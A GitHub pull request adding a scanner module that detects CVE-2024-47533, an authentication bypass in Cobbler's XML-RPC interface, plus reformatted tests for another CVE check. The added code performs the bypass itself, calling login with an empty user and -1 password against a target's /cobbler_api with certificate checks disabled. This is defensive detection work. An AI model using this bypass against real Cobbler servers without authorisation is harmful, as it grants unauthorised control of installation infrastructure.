Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Detection for CVE-2024-47533. #138

Merged
merged 9 commits into from
Nov 22, 2024
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
121 changes: 121 additions & 0 deletions agent/exploits/cve_2024_47533.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,121 @@
"""Agent Asteroid implementation for CVE-2024-47533"""

import xmlrpc.client
import ssl
from urllib import parse as urlparse
import datetime
import re

import requests
from requests import exceptions as requests_exceptions
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
from xml.parsers import expat

from agent import definitions
from agent.asteroid_agent import logger
from agent.exploits import webexploit
from agent import exploits_registry

VULNERABILITY_TITLE = "Cobbler XMLRPC Interface Authentication Bypass"
VULNERABILITY_REFERENCE = "CVE-2024-47533"
VULNERABILITY_DESCRIPTION = """Cobbler, a widely used Linux installation server for network installation environments, contains a critical
authentication flaw in versions 3.0.0 to 3.2.2 and 3.3.6. This vulnerability is due to a defective function,
bypassing authentication checks for the Cobbler XML-RPC interface."""
RISK_RATING = "CRITICAL"
DEFAULT_TIMEOUT = datetime.timedelta(seconds=30)

JSON_INDICATORS = ['"cobbler_api"', '"mappings"', '"settings"']
XML_INDICATORS = ["<?xml", "<methodCall>", "<methodName>", "<params>"]

accept_pattern = [
re.compile("|".join(JSON_INDICATORS)),
re.compile("|".join(XML_INDICATORS)),
]


def _can_bypass_auth(target_url: str) -> bool:
"""Attempt to log in with invalid credentials to verify authentication bypass."""
try:
if target_url.startswith("https://") is True:
ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE

Check warning on line 41 in agent/exploits/cve_2024_47533.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2024_47533.py#L39-L41

Added lines #L39 - L41 were not covered by tests

transport = xmlrpc.client.SafeTransport(

Check warning on line 43 in agent/exploits/cve_2024_47533.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2024_47533.py#L43

Added line #L43 was not covered by tests
use_datetime=True, context=ssl_context
)
conn = xmlrpc.client.ServerProxy(target_url, transport=transport)

Check warning on line 46 in agent/exploits/cve_2024_47533.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2024_47533.py#L46

Added line #L46 was not covered by tests
else:
conn = xmlrpc.client.ServerProxy(target_url)

token = conn.login("", -1)
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved

logger.info("Authentication bypass succeeded with token: %s", token)
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
return True

except xmlrpc.client.Fault as e:
logger.error("Authentication attempt resulted in Fault: %s", e)
return False

except expat.ExpatError as e:
logger.error("XML parsing error occurred: %s", str(e))
return False

Check warning on line 61 in agent/exploits/cve_2024_47533.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2024_47533.py#L60-L61

Added lines #L60 - L61 were not covered by tests

except (
xmlrpc.client.ProtocolError,
ssl.SSLError,
requests_exceptions.RequestException,
) as e:
logger.error("Connection error occurred: %s", str(e))
return False


@exploits_registry.register
class CVE202447533CobblerExploit(webexploit.WebExploit):
accept_request = definitions.Request(
method="GET",
path="/cobbler_api",
)

accept_pattern = accept_pattern
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved

metadata = definitions.VulnerabilityMetadata(
title=VULNERABILITY_TITLE,
description=VULNERABILITY_DESCRIPTION,
reference=VULNERABILITY_REFERENCE,
risk_rating=RISK_RATING,
)

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
"""Check if the target is vulnerable to the authentication bypass."""
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
vulnerabilities: list[definitions.Vulnerability] = []
target_endpoint = urlparse.urljoin(target.origin, self.accept_request.path)

if _can_bypass_auth(target_endpoint) is True:
vulnerabilities.append(self._create_vulnerability(target))
else:
logger.info("Authentication bypass failed.")

return vulnerabilities

def accept(self, target: definitions.Target) -> bool:
"""Override the accept method to match JSON or XML response patterns."""
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
target_endpoint = urlparse.urljoin(target.origin, self.accept_request.path)

try:
req = requests.Request(
method=self.accept_request.method,
url=target_endpoint,
).prepare()

if self.accept_request.headers is not None:
self.accept_request.headers.update(req.headers)
req.headers = self.accept_request.headers # type: ignore

Check warning on line 112 in agent/exploits/cve_2024_47533.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2024_47533.py#L111-L112

Added lines #L111 - L112 were not covered by tests
resp = self.session.send(req, timeout=DEFAULT_TIMEOUT.seconds)

except requests_exceptions.RequestException:
return False

Check warning on line 116 in agent/exploits/cve_2024_47533.py

View check run for this annotation

Codecov / codecov/patch

agent/exploits/cve_2024_47533.py#L115-L116

Added lines #L115 - L116 were not covered by tests

for pattern in self.accept_pattern:
if pattern.search(resp.text) is not None:
return True
return False
84 changes: 53 additions & 31 deletions tests/exploits/cve_2024_40725_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -62,9 +62,12 @@ def testAccept_whenRequestException_reportFalse(

def testCVE202440725_whenVulnerable_reportFinding() -> None:
"""Test the check method when a vulnerability is found."""
with mock.patch(
"agent.exploits.cve_2024_40725._read_filenames", return_value=["index.php"]
), mock.patch("agent.exploits.cve_2024_40725._check_files", return_value=True):
with (
mock.patch(
"agent.exploits.cve_2024_40725._read_filenames", return_value=["index.php"]
),
mock.patch("agent.exploits.cve_2024_40725._check_files", return_value=True),
):
exploit_instance = cve_2024_40725.ApacheSourceCodeDisclosureExploit()
target = definitions.Target("http", "example.com", 80)

Expand All @@ -79,9 +82,12 @@ def testCVE202440725_whenVulnerable_reportFinding() -> None:

def testCVE202440725_whenSafe_reportNothing() -> None:
"""Test the check method when no vulnerability is found."""
with mock.patch(
"agent.exploits.cve_2024_40725._read_filenames", return_value=["index.php"]
), mock.patch("agent.exploits.cve_2024_40725._check_files", return_value=False):
with (
mock.patch(
"agent.exploits.cve_2024_40725._read_filenames", return_value=["index.php"]
),
mock.patch("agent.exploits.cve_2024_40725._check_files", return_value=False),
):
exploit_instance = cve_2024_40725.ApacheSourceCodeDisclosureExploit()
target = definitions.Target("http", "example.com", 80)

Expand All @@ -108,12 +114,16 @@ def testCVE202440725_whenNoFilenamesFound_reportNothing(

def testCVE202440725_whenRequestException_reportLoggedErrors() -> None:
"""Test the check method when a request exception occurs."""
with mock.patch(
"agent.exploits.cve_2024_40725._read_filenames", return_value=["index.php"]
), mock.patch(
"agent.definitions.HttpSession.get",
side_effect=requests.RequestException("Request error"),
), mock.patch("agent.exploits.cve_2024_40725.logger") as mock_logger:
with (
mock.patch(
"agent.exploits.cve_2024_40725._read_filenames", return_value=["index.php"]
),
mock.patch(
"agent.definitions.HttpSession.get",
side_effect=requests.RequestException("Request error"),
),
mock.patch("agent.exploits.cve_2024_40725.logger") as mock_logger,
):
exploit_instance = cve_2024_40725.ApacheSourceCodeDisclosureExploit()
target = definitions.Target("http", "example.com", 80)

Expand All @@ -127,14 +137,18 @@ def testCVE202440725_whenRequestException_reportLoggedErrors() -> None:

def testCVE202440725_whenHTTPError_reportLoggedErrors() -> None:
"""Test the check method when requests.Get raises an HTTPError."""
with mock.patch(
"agent.definitions.HttpSession.get",
side_effect=requests.exceptions.HTTPError(
"HTTP error", response=requests.models.Response()
with (
mock.patch(
"agent.definitions.HttpSession.get",
side_effect=requests.exceptions.HTTPError(
"HTTP error", response=requests.models.Response()
),
),
mock.patch(
"agent.exploits.cve_2024_40725._contains_code_content", return_value=True
),
), mock.patch(
"agent.exploits.cve_2024_40725._contains_code_content", return_value=True
), mock.patch("agent.exploits.cve_2024_40725.logger") as mock_logger:
mock.patch("agent.exploits.cve_2024_40725.logger") as mock_logger,
):
with mock.patch(
"agent.exploits.cve_2024_40725._read_filenames", return_value=["index.php"]
):
Expand All @@ -152,12 +166,16 @@ def testCVE202440725_whenHTTPError_reportLoggedErrors() -> None:

def testCVE202440725_whenConnectionError_reportLoggedErrors() -> None:
"""Test the check method when requests.Get raises a ConnectionError."""
with mock.patch(
"agent.definitions.HttpSession.get",
side_effect=requests.exceptions.ConnectionError("Connection error"),
), mock.patch(
"agent.exploits.cve_2024_40725._contains_code_content", return_value=True
), mock.patch("agent.exploits.cve_2024_40725.logger") as mock_logger:
with (
mock.patch(
"agent.definitions.HttpSession.get",
side_effect=requests.exceptions.ConnectionError("Connection error"),
),
mock.patch(
"agent.exploits.cve_2024_40725._contains_code_content", return_value=True
),
mock.patch("agent.exploits.cve_2024_40725.logger") as mock_logger,
):
with mock.patch(
"agent.exploits.cve_2024_40725._read_filenames", return_value=["index.php"]
):
Expand All @@ -175,12 +193,16 @@ def testCVE202440725_whenConnectionError_reportLoggedErrors() -> None:

def testCVE202440725_whenTimeoutError_reportLoggedErrors() -> None:
"""Test the check method when requests.Get raises a Timeout."""
with mock.patch(
"agent.definitions.HttpSession.get",
side_effect=requests.exceptions.Timeout("Timeout error"),
), mock.patch(
"agent.exploits.cve_2024_40725._contains_code_content", return_value=True
), mock.patch("agent.exploits.cve_2024_40725.logger") as mock_logger:
with (
mock.patch(
"agent.definitions.HttpSession.get",
side_effect=requests.exceptions.Timeout("Timeout error"),
),
mock.patch(
"agent.exploits.cve_2024_40725._contains_code_content", return_value=True
),
mock.patch("agent.exploits.cve_2024_40725.logger") as mock_logger,
):
with mock.patch(
"agent.exploits.cve_2024_40725._read_filenames", return_value=["index.php"]
):
Expand Down
Loading
Loading